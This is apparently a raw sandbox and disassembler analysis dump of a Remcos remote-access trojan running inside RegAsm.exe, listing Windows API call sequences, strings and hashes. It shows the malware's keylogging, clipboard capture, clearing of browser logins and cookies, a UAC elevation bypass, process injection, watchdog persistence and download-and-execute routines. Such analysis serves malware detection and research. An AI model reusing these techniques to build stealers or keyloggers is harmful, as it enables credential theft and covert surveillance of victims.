                                  • OpenProcess.KERNEL32(001FFFFF,00000000,?), ref: 00412455
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000014.00000002.2378700702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: CloseCreateOpenProcess$CurrentHandleMutexThreadValue
                                  • String ID: Remcos restarted by watchdog!$WDH$Watchdog launch failed!$Watchdog module activated$WinDir$\SysWOW64\$\system32\$fsutil.exe$rmclient.exe$svchost.exe
                                  • API String ID: 3018269243-13974260
                                  • Opcode ID: 72932527d79eb0b84df19a67bf2cbe60f69183da4d25f0da7fa945edb6755c4f
                                  • Instruction ID: f1b014459f2de55ad39b9ce4e2eab06dd530905b6b6ad57ecd0cf2e75cce6712
                                  • Opcode Fuzzy Hash: 72932527d79eb0b84df19a67bf2cbe60f69183da4d25f0da7fa945edb6755c4f
                                  • Instruction Fuzzy Hash: B971A23160430167C614FB72CD579AE77A4AE94308F40097FF586A21E2FFBC9A49C69E
                                  APIs
                                  • FindFirstFileA.KERNEL32(00000000,?,00000000,\AppData\Roaming\Mozilla\Firefox\Profiles\), ref: 0040BBEA
                                  • FindClose.KERNEL32(00000000), ref: 0040BC04
                                  • FindNextFileA.KERNEL32(00000000,?), ref: 0040BD27
                                  • FindClose.KERNEL32(00000000), ref: 0040BD4D
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000014.00000002.2378700702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Find$CloseFile$FirstNext
                                  • String ID: [Firefox StoredLogins Cleared!]$[Firefox StoredLogins not found]$UserProfile$\AppData\Roaming\Mozilla\Firefox\Profiles\$\key3.db$\logins.json
                                  • API String ID: 1164774033-3681987949
                                  • Opcode ID: b41a8e288d6c781c84b11b836a0024b7a118f79960b3641b573c725179fdc384
                                  • Instruction ID: 8b0b2ff803da1d4b435a108118727fe7c74031c8ac088da8990f7d135a86af9b
                                  • Opcode Fuzzy Hash: b41a8e288d6c781c84b11b836a0024b7a118f79960b3641b573c725179fdc384
                                  • Instruction Fuzzy Hash: C7514F3190021A9ADB14FBB2DC56AEEB739AF10304F50057FF506721E2FF785A49CA99
                                  APIs
                                  • OpenClipboard.USER32 ref: 004168FD
                                  • EmptyClipboard.USER32 ref: 0041690B
                                  • GlobalAlloc.KERNEL32(00002000,-00000002), ref: 0041692B
                                  • GlobalLock.KERNEL32(00000000), ref: 00416934
                                  • GlobalUnlock.KERNEL32(00000000), ref: 0041696A
                                  • SetClipboardData.USER32(0000000D,00000000), ref: 00416973
                                  • CloseClipboard.USER32 ref: 00416990
                                  • OpenClipboard.USER32 ref: 00416997
                                  • GetClipboardData.USER32(0000000D), ref: 004169A7
                                  • GlobalLock.KERNEL32(00000000), ref: 004169B0
                                  • GlobalUnlock.KERNEL32(00000000), ref: 004169B9
                                  • CloseClipboard.USER32 ref: 004169BF
                                    • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000014.00000002.2378700702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Clipboard$Global$CloseDataLockOpenUnlock$AllocEmptysend
                                  • String ID: !D@
                                  • API String ID: 3520204547-604454484
                                  • Opcode ID: 22014e37a0533ad6d5301b9a6db5ea665297cd973015afcf0188733ddc164352
                                  • Instruction ID: 548dc4d81477911aad8e8b192ef25fd2d65b79b2884d290c2f7190e4363fe536
                                  • Opcode Fuzzy Hash: 22014e37a0533ad6d5301b9a6db5ea665297cd973015afcf0188733ddc164352
                                  • Instruction Fuzzy Hash: 23215171204301EBD714BB71DC5DAAE7AA9AF88746F00043EF946961E2EF3C8C45866A
                                  APIs
                                  • FindFirstFileA.KERNEL32(00000000,?,00000000,\AppData\Roaming\Mozilla\Firefox\Profiles\), ref: 0040BDEA
                                  • FindClose.KERNEL32(00000000), ref: 0040BE04
                                  • FindNextFileA.KERNEL32(00000000,?), ref: 0040BEC4
                                  • FindClose.KERNEL32(00000000), ref: 0040BEEA
                                  • FindClose.KERNEL32(00000000), ref: 0040BF0B
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000014.00000002.2378700702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Find$Close$File$FirstNext
                                  • String ID: [Firefox Cookies not found]$[Firefox cookies found, cleared!]$UserProfile$\AppData\Roaming\Mozilla\Firefox\Profiles\$\cookies.sqlite
                                  • API String ID: 3527384056-432212279
                                  • Opcode ID: 957e4b9f77f0127c971f2cbaa54e22c6f4c97dcdb1298e2b7e9e5f591e6deb8c
                                  • Instruction ID: 490896facf616f27299b965c2ba25c256be2621490ca3b25f990f1d956524bcc
                                  • Opcode Fuzzy Hash: 957e4b9f77f0127c971f2cbaa54e22c6f4c97dcdb1298e2b7e9e5f591e6deb8c
                                  • Instruction Fuzzy Hash: E0417F3190021AAACB04F7B2DC5A9EE7769AF11704F50057FF506B21E2EF385A458A9D
                                  APIs
                                  • __EH_prolog.LIBCMT ref: 0041A04A
                                  • GdiplusStartup.GDIPLUS(00474ACC,?,00000000), ref: 0041A07C
                                  • CreateDirectoryW.KERNEL32(00000000,00000000,00000000,0000001A,00000019), ref: 0041A108
                                  • Sleep.KERNEL32(000003E8), ref: 0041A18E
                                  • GetLocalTime.KERNEL32(?), ref: 0041A196
                                  • Sleep.KERNEL32(00000000,00000018,00000000), ref: 0041A285
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000014.00000002.2378700702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Sleep$CreateDirectoryGdiplusH_prologLocalStartupTime
                                  • String ID: time_%04i%02i%02i_%02i%02i%02i$wnd_%04i%02i%02i_%02i%02i%02i$PG$PG$PG
                                  • API String ID: 489098229-1431523004
                                  • Opcode ID: 2b4183d8bba473354f186d6fd22040c2ea42666b5de8bb998ac3c21ef9cf795b
                                  • Instruction ID: 12d64888f2a2aa40a87de1a625a26b3edd7a2139bf4817292c9f8cf1352d8a2d
                                  • Opcode Fuzzy Hash: 2b4183d8bba473354f186d6fd22040c2ea42666b5de8bb998ac3c21ef9cf795b
                                  • Instruction Fuzzy Hash: 7A517D70A002159ACB14BBB5C8529FD77A9AF54308F40407FF509AB1E2EF7C9D85C799
                                  APIs
                                  • GetModuleFileNameW.KERNEL32(00000000,?,00000104,00000000,004750E4,?,00475338), ref: 0040F4C9
                                  • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,00475338), ref: 0040F4F4
                                  • Process32FirstW.KERNEL32(00000000,0000022C), ref: 0040F510
                                  • Process32NextW.KERNEL32(00000000,0000022C), ref: 0040F58F
                                  • CloseHandle.KERNEL32(00000000,?,00000000,?,?,00475338), ref: 0040F59E
                                    • Part of subcall function 0041C26E: OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 0041C286
                                    • Part of subcall function 0041C26E: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 0041C299
                                  • CloseHandle.KERNEL32(00000000,?,00475338), ref: 0040F6A9
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000014.00000002.2378700702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: CloseHandleOpenProcessProcess32$CreateFileFirstModuleNameNextSnapshotToolhelp32
                                  • String ID: C:\Program Files(x86)\Internet Explorer\$Inj$ieinstal.exe$ielowutil.exe
                                  • API String ID: 3756808967-1743721670
                                  • Opcode ID: 7e174afa80332a6d9799d90a5ef8f927f9e1300862e9f2cc4ca1dfb4d5584e6a
                                  • Instruction ID: 73d50abc618c2a3d6a57d9d5b79267519347fdb4c989691d2635b3abfd1995a7
                                  • Opcode Fuzzy Hash: 7e174afa80332a6d9799d90a5ef8f927f9e1300862e9f2cc4ca1dfb4d5584e6a
                                  • Instruction Fuzzy Hash: B5712E705083419AC724FB21D8959AEB7E4AF90348F40483FF586631E3EF79994DCB9A
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000014.00000002.2378700702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: 0$1$2$3$4$5$6$7$VG
                                  • API String ID: 0-1861860590
                                  • Opcode ID: 23e062be4493d8f612a0f73d7cec249050aa78cf65a3b1cbc455386ce95aeb4f
                                  • Instruction ID: 7133b754bba813e7b371628f59950815dc208a5c28e1558ec9b3f3725e93ffbd
                                  • Opcode Fuzzy Hash: 23e062be4493d8f612a0f73d7cec249050aa78cf65a3b1cbc455386ce95aeb4f
                                  • Instruction Fuzzy Hash: 9171E2709183019FD704EF21D862BAB7B94DF85710F00492FF5A26B2D1DE78AB49CB96
                                  APIs
                                  • _wcslen.LIBCMT ref: 0040755C
                                  • CoGetObject.OLE32(?,00000024,00466528,00000000), ref: 004075BD
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000014.00000002.2378700702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Object_wcslen
                                  • String ID: $$Elevation:Administrator!new:$[+] CoGetObject$[+] CoGetObject SUCCESS$[+] ucmAllocateElevatedObject$[-] CoGetObject FAILURE${3E5FC7F9-9A51-4367-9063-A120244FBEC7}
                                  APIs
                                  • OpenSCManagerA.ADVAPI32(00000000,00000000,00000004,004758E8), ref: 0041A7EF
                                  • EnumServicesStatusW.ADVAPI32(00000000,0000003B,00000003,?,00000000,?,?,?), ref: 0041A83E
                                  • GetLastError.KERNEL32 ref: 0041A84C
                                  • EnumServicesStatusW.ADVAPI32(00000000,0000003B,00000003,00000000,?,?,?,?), ref: 0041A884
                                  Similarity
                                  • API ID: EnumServicesStatus$ErrorLastManagerOpen
                                  APIs
                                    • Part of subcall function 00448295: GetLastError.KERNEL32(?,0043F770,0043A875,0043F770,00474EF8,PkGNG,0043CE65,FF8BC35D,00474EF8,00474EF8), ref: 00448299
                                    • Part of subcall function 00448295: _free.LIBCMT ref: 004482CC
                                    • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,?,?,00000000), ref: 0044830D
                                    • Part of subcall function 00448295: _abort.LIBCMT ref: 00448313
                                    • Part of subcall function 00448295: _free.LIBCMT ref: 004482F4
                                    • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,?,?,00000000), ref: 00448301
                                  • GetUserDefaultLCID.KERNEL32(?,?,?), ref: 0045279C
                                  • IsValidCodePage.KERNEL32(00000000), ref: 004527F7
                                  • IsValidLocale.KERNEL32(?,00000001), ref: 00452806
                                  • GetLocaleInfoW.KERNEL32(?,00001001,JD,00000040,?,?,00000055,00000000,?,?,00000055,00000000), ref: 0045284E
                                  • GetLocaleInfoW.KERNEL32(?,00001002,00000000,00000040), ref: 0045286D
                                  Similarity
                                  • API ID: ErrorLastLocale$InfoValid_free$CodeDefaultPageUser_abort
                                  • String ID: JD$JD$JD
                                  APIs
                                  • FindFirstFileW.KERNEL32(00000000,?,\Mozilla\Firefox\Profiles\,00000000), ref: 0040C3D6
                                  • FindNextFileW.KERNEL32(00000000,?), ref: 0040C4A9
                                  • FindClose.KERNEL32(00000000), ref: 0040C4B8
                                  • FindClose.KERNEL32(00000000), ref: 0040C4E3
                                  Similarity
                                  • API ID: Find$CloseFile$FirstNext
                                  • String ID: AppData$\Mozilla\Firefox\Profiles\$\cookies.sqlite
                                  APIs
                                  • GetModuleHandleA.KERNEL32(00000000,00000000), ref: 0040A30E
                                  • SetWindowsHookExA.USER32(0000000D,0040A2DF,00000000), ref: 0040A31C
                                  • GetLastError.KERNEL32 ref: 0040A328
                                    • Part of subcall function 0041B580: GetLocalTime.KERNEL32(00000000), ref: 0041B59A
                                  • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 0040A376
                                  • TranslateMessage.USER32(?), ref: 0040A385
                                  • DispatchMessageA.USER32(?), ref: 0040A390
                                  Similarity
                                  • API ID: Message$DispatchErrorHandleHookLastLocalModuleTimeTranslateWindows
                                  • String ID: Keylogger initialization failure: error $`#v
                                  APIs
                                  • FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,00474EE0,?), ref: 0041C37D
                                  • FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,00474EE0,?), ref: 0041C3AD
                                  • SetFileAttributesW.KERNEL32(?,00000080,?,?,?,?,?,00474EE0,?), ref: 0041C41F
                                  • DeleteFileW.KERNEL32(?,?,?,?,?,?,00474EE0,?), ref: 0041C42C
                                    • Part of subcall function 0041C322: RemoveDirectoryW.KERNEL32(?,?,?,?,?,?,00474EE0,?), ref: 0041C402
                                  • GetLastError.KERNEL32(?,?,?,?,?,00474EE0,?), ref: 0041C44D
                                  • FindClose.KERNEL32(00000000,?,?,?,?,?,00474EE0,?), ref: 0041C463
                                  • RemoveDirectoryW.KERNEL32(00000000,?,?,?,?,?,00474EE0,?), ref: 0041C46A
                                  • FindClose.KERNEL32(00000000,?,?,?,?,?,00474EE0,?), ref: 0041C473
                                  Similarity
                                  • API ID: FileFind$CloseDirectoryRemove$AttributesDeleteErrorFirstLastNext
                                  APIs
                                  • FindFirstFileW.KERNEL32(00000000,?), ref: 00419DDC
                                  • FindNextFileW.KERNEL32(00000000,?,?), ref: 00419EA8
                                    • Part of subcall function 0041C516: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,00000000,?,?,00000000,0040412F,00465E84), ref: 0041C52F
                                  Similarity
                                  • API ID: File$Find$CreateFirstNext
                                  APIs
                                  • GetForegroundWindow.USER32 ref: 0040A451
                                  • GetWindowThreadProcessId.USER32(00000000,?), ref: 0040A45D
                                  • GetKeyboardLayout.USER32(00000000), ref: 0040A464
                                  • GetKeyState.USER32(00000010), ref: 0040A46E
                                  • GetKeyboardState.USER32(?), ref: 0040A479
                                  • ToUnicodeEx.USER32(?,?,?,?,00000010,00000000,00000000), ref: 0040A49C
                                  • ToUnicodeEx.USER32(?,?,00000010,00000000,00000000), ref: 0040A4FC
                                  • ToUnicodeEx.USER32(?,?,?,?,00000010,00000000,00000000), ref: 0040A535
                                  Similarity
                                  • API ID: Unicode$KeyboardStateWindow$ForegroundLayoutProcessThread
                                  APIs
                                  • RegCreateKeyExW.ADVAPI32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000001), ref: 004140D8
                                  • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,00000001), ref: 004140E4
                                    • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                  • LoadLibraryA.KERNEL32(Shlwapi.dll,SHDeleteKeyW,00000000,00000001), ref: 004142A5
                                  • GetProcAddress.KERNEL32(00000000), ref: 004142AC
                                  Similarity
                                  • API ID: AddressCloseCreateLibraryLoadProcsend
                                  • String ID: SHDeleteKeyW$Shlwapi.dll
                                  APIs
                                  • _free.LIBCMT ref: 00449292
                                  • _free.LIBCMT ref: 004492B6
                                  • _free.LIBCMT ref: 0044943D
                                  • GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,0045F244), ref: 0044944F
                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,00472764,000000FF,00000000,0000003F,00000000,?,?), ref: 004494C7
                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,004727B8,000000FF,?,0000003F,00000000,?), ref: 004494F4
                                  • _free.LIBCMT ref: 00449609
                                  Similarity
                                  • API ID: _free$ByteCharMultiWide$InformationTimeZone
                                  APIs
                                    • Part of subcall function 0041798D: GetCurrentProcess.KERNEL32(00000028,?), ref: 0041799A
                                    • Part of subcall function 0041798D: OpenProcessToken.ADVAPI32(00000000), ref: 004179A1
                                    • Part of subcall function 0041798D: LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 004179B3
                                    • Part of subcall function 0041798D: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 004179D2
                                    • Part of subcall function 0041798D: GetLastError.KERNEL32 ref: 004179D8
                                  • ExitWindowsEx.USER32(00000000,00000001), ref: 00416891
                                  • LoadLibraryA.KERNEL32(PowrProf.dll,SetSuspendState,00000000,00000000,00000000), ref: 004168A6
                                  • GetProcAddress.KERNEL32(00000000), ref: 004168AD
                                  Similarity
                                  • API ID: ProcessToken$AddressAdjustCurrentErrorExitLastLibraryLoadLookupOpenPrivilegePrivilegesProcValueWindows
                                  • String ID: !D@$PowrProf.dll$SetSuspendState
                                  APIs
                                  • InternetOpenW.WININET(00000000,00000001,00000000,00000000,00000000), ref: 0041B438
                                  • InternetOpenUrlW.WININET(00000000,http://geoplugin.net/json.gp,00000000,00000000,80000000,00000000), ref: 0041B44E
                                  • InternetReadFile.WININET(00000000,00000000,0000FFFF,00000000), ref: 0041B467
                                  • InternetCloseHandle.WININET(00000000), ref: 0041B4AD
                                  • InternetCloseHandle.WININET(00000000), ref: 0041B4B0
                                  Strings
                                  • http://geoplugin.net/json.gp, xrefs: 0041B448
                                  Similarity
                                  • API ID: Internet$CloseHandleOpen$FileRead
                                  • String ID: http://geoplugin.net/json.gp
                                  APIs
                                  • DeleteFileA.KERNEL32(00000000,\AppData\Local\Google\Chrome\User Data\Default\Login Data), ref: 0040BA89
                                  • GetLastError.KERNEL32 ref: 0040BA93
                                  Strings
                                  • UserProfile, xrefs: 0040BA59
                                  • [Chrome StoredLogins found, cleared!], xrefs: 0040BAB9
                                  • \AppData\Local\Google\Chrome\User Data\Default\Login Data, xrefs: 0040BA54
                                  • [Chrome StoredLogins not found], xrefs: 0040BAAD
                                  Similarity
                                  • API ID: DeleteErrorFileLast
                                  • String ID: [Chrome StoredLogins found, cleared!]$[Chrome StoredLogins not found]$UserProfile$\AppData\Local\Google\Chrome\User Data\Default\Login Data
                                  APIs
                                  • GetCurrentProcess.KERNEL32(00000028,?), ref: 0041799A
                                  • OpenProcessToken.ADVAPI32(00000000), ref: 004179A1
                                  • LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 004179B3
                                  • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 004179D2
                                  • GetLastError.KERNEL32 ref: 004179D8
                                  Similarity
                                  • API ID: ProcessToken$AdjustCurrentErrorLastLookupOpenPrivilegePrivilegesValue
                                  • String ID: SeShutdownPrivilege
                                  APIs
                                  • __EH_prolog.LIBCMT ref: 00409293
                                    • Part of subcall function 004048C8: connect.WS2_32(?,?,?), ref: 004048E0
                                    • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 0040932F
                                  • FindFirstFileW.KERNEL32(00000000,?,?,?,00000064), ref: 0040938D
                                  • FindNextFileW.KERNEL32(00000000,?), ref: 004093E5
                                  • FindClose.KERNEL32(00000000), ref: 004093FC
                                    • Part of subcall function 00404E26: WaitForSingleObject.KERNEL32(?,000000FF,00000000,00474EF8,PkGNG,00000000,00474EF8,00404CA8,00000000,?,?,?,00474EF8,?), ref: 00404E38
                                    • Part of subcall function 00404E26: SetEvent.KERNEL32(?), ref: 00404E43
                                    • Part of subcall function 00404E26: CloseHandle.KERNEL32(?), ref: 00404E4C
                                  • FindClose.KERNEL32(00000000), ref: 004095F4
                                    • Part of subcall function 00404AA1: WaitForSingleObject.KERNEL32(?,00000000,00401A45,?,?,00000004,?,?,00000004,00476B50,00474EE0,00000000), ref: 00404B47
                                    • Part of subcall function 00404AA1: SetEvent.KERNEL32(?,?,?,00000004,?,?,00000004,00476B50,00474EE0,00000000,?,?,?,?,?,00401A45), ref: 00404B75
                                  Similarity
                                  • API ID: Find$Close$EventFileObjectSingleWait$Exception@8FirstH_prologHandleNextThrowconnectsend
                                  APIs
                                  • OpenSCManagerW.ADVAPI32(00000000,00000000,00000010,00000000,00000001,?,0041A731,00000000), ref: 0041AAE4
                                  • OpenServiceW.ADVAPI32(00000000,00000000,00000010,?,0041A731,00000000), ref: 0041AAF9
                                  • CloseServiceHandle.ADVAPI32(00000000,?,0041A731,00000000), ref: 0041AB06
                                  • StartServiceW.ADVAPI32(00000000,00000000,00000000,?,0041A731,00000000), ref: 0041AB11
                                  • CloseServiceHandle.ADVAPI32(00000000,?,0041A731,00000000), ref: 0041AB23
                                  • CloseServiceHandle.ADVAPI32(00000000,?,0041A731,00000000), ref: 0041AB26
                                  Similarity
                                  • API ID: Service$CloseHandle$Open$ManagerStart
                                  APIs
                                    • Part of subcall function 00413584: RegOpenKeyExA.ADVAPI32(80000001,00000000,00000000,00020019,00000000,00000000), ref: 004135A4
                                    • Part of subcall function 00413584: RegQueryValueExA.ADVAPI32(00000000,?,00000000,?,?,?), ref: 004135C2
                                    • Part of subcall function 00413584: RegCloseKey.ADVAPI32(00000000), ref: 004135CD
                                  • Sleep.KERNEL32(00000BB8), ref: 0040F896
                                  • ExitProcess.KERNEL32 ref: 0040F905
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000014.00000002.2378700702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                  • API ID: CloseExitOpenProcessQuerySleepValue
                                  • String ID: 5.1.2 Pro$override$pth_unenc
                                  • API String ID: 2281282204-3554326054
                                  • Opcode ID: 0a9b0b8e18e6e63923395880d3987700b8c960eca4e781d2f00c21a7a482b044
                                  • Instruction ID: d275b5d15c9ff05a0ec0da3c9587874d7690dc7fa5d0ec02d6e8a4ede61593ab
                                  • Opcode Fuzzy Hash: 0a9b0b8e18e6e63923395880d3987700b8c960eca4e781d2f00c21a7a482b044
                                  • Instruction Fuzzy Hash: 5921E171B0420127D6087676885B6AE399A9B80708F50453FF409672D7FF7C8E0483AF
                                  APIs
                                  • GetLocaleInfoW.KERNEL32(FDE8FE81,2000000B,00000000,00000002,00000000,?,?,?,004527DB,?,00000000), ref: 00452555
                                  • GetLocaleInfoW.KERNEL32(FDE8FE81,20001004,00000000,00000002,00000000,?,?,?,004527DB,?,00000000), ref: 0045257E
                                  • GetACP.KERNEL32(?,?,004527DB,?,00000000), ref: 00452593
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000014.00000002.2378700702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                  • API ID: InfoLocale
                                  • String ID: ACP$OCP
                                  • API String ID: 2299586839-711371036
                                  • Opcode ID: 61c68c86ee519c97ea86d50e82dd2762e668b1fdc7e44e8e256cfbf4b452970f
                                  • Instruction ID: 097c3b5166b2d36aca1cb621bb06e922528e2ea4561953c90108b9915aa2a338
                                  • Opcode Fuzzy Hash: 61c68c86ee519c97ea86d50e82dd2762e668b1fdc7e44e8e256cfbf4b452970f
                                  • Instruction Fuzzy Hash: 7E21F932600108B6D734CF14CA10A9B73A6EB16B53B564467ED09D7312F7B6DD44C398
                                  APIs
                                  • FindResourceA.KERNEL32(SETTINGS,0000000A,00000000), ref: 0041B54A
                                  • LoadResource.KERNEL32(00000000,?,?,0040F419,00000000), ref: 0041B55E
                                  • LockResource.KERNEL32(00000000,?,?,0040F419,00000000), ref: 0041B565
                                  • SizeofResource.KERNEL32(00000000,?,?,0040F419,00000000), ref: 0041B574
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000014.00000002.2378700702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                  • API ID: Resource$FindLoadLockSizeof
                                  • String ID: SETTINGS
                                  • API String ID: 3473537107-594951305
                                  • Opcode ID: a45aaf07b9511fe1cfb91064365b640b81f442c86eb18a115f7d7951e0b61df2
                                  • Instruction ID: d04f7a3eece584ab18b37ce022e38df3785cd6d6757b7dd0dc659012c7d5cbc3
                                  • Opcode Fuzzy Hash: a45aaf07b9511fe1cfb91064365b640b81f442c86eb18a115f7d7951e0b61df2
                                  • Instruction Fuzzy Hash: 8EE01A76600B22EBEB211BB1AC4CD863E29F7C97637140075F90586231CB798840DA98
                                  APIs
                                  • __EH_prolog.LIBCMT ref: 004096A5
                                  • FindFirstFileW.KERNEL32(00000000,?,00000000,00000000,?), ref: 0040971D
                                  • FindNextFileW.KERNEL32(00000000,?), ref: 00409746
                                  • FindClose.KERNEL32(000000FF,?,?,?,?,?,?), ref: 0040975D
                                  Memory Dump Source
                                  • Source File: 00000014.00000002.2378700702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                  • API ID: Find$File$CloseFirstH_prologNext
                                  • String ID:
                                  • API String ID: 1157919129-0
                                  • Opcode ID: dd0421224294bb62472ab89505622d6763c67607e6c73e6d1c5958e8fabc376b
                                  • Instruction ID: 8e52766585a78a9bd0f7e398a9017c7fe376444e683812dd136b20495b515571
                                  • Opcode Fuzzy Hash: dd0421224294bb62472ab89505622d6763c67607e6c73e6d1c5958e8fabc376b
                                  • Instruction Fuzzy Hash: 7F814C328001099BCB15EBA2DC969EDB378AF14318F10417FE506B71E2EF789E49CB58
                                  APIs
                                  • __EH_prolog.LIBCMT ref: 0040884C
                                  • FindFirstFileW.KERNEL32(00000000,?,00466618,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00408905
                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 0040892D
                                  • FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040893A
                                  • FindClose.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00408A50
                                  Memory Dump Source
                                  • Source File: 00000014.00000002.2378700702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                  • API ID: Find$File$CloseException@8FirstH_prologNextThrow
                                  • String ID:
                                  • API String ID: 1771804793-0
                                  • Opcode ID: 3108295a3ea490f6f4279643bcf91a98a4e8460a72a47f708dfbc03d5f7be2ca
                                  • Instruction ID: 0d5560aa06bbfb8d15084ed76e809f646cede1ce68103026aeaac9ba950e1e68
                                  • Opcode Fuzzy Hash: 3108295a3ea490f6f4279643bcf91a98a4e8460a72a47f708dfbc03d5f7be2ca
                                  • Instruction Fuzzy Hash: 9D517F72900209AACB04FB65DD569ED7778AF10308F50417FB906B71E2EF389B49CB89
                                  APIs
                                  • ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000001), ref: 00406FF7
                                  • URLDownloadToFileW.URLMON(00000000,00000000,00000004,00000000,00000000), ref: 004070DB
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000014.00000002.2378700702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                  • API ID: DownloadExecuteFileShell
                                  • String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe$open
                                  • API String ID: 2825088817-3056885514
                                  • Opcode ID: 7772d264ec74869141b014490c566259b039335beacd565e5cb36fd33a70e94b
                                  • Instruction ID: 89f65c5a2840bfed21b3c91f130df949caec66636536da5e2ea9f2eef63816fc
                                  • Opcode Fuzzy Hash: 7772d264ec74869141b014490c566259b039335beacd565e5cb36fd33a70e94b
                                  • Instruction Fuzzy Hash: 5261B371A0830166CA14FB76C8569BE37A59F81758F40093FB9427B2D3EE3C9905C69B
                                  APIs
                                  • FindFirstFileW.KERNEL32(00000000,?,?,?,00000000), ref: 00407892
                                  • FindNextFileW.KERNEL32(00000000,?,?,?,00000000), ref: 0040795A
                                    • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000014.00000002.2378700702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_20_2_400000_RegAsm.jbxd
                                  • API ID: FileFind$FirstNextsend
                                  • String ID: XPG$XPG
                                  • API String ID: 4113138495-1962359302
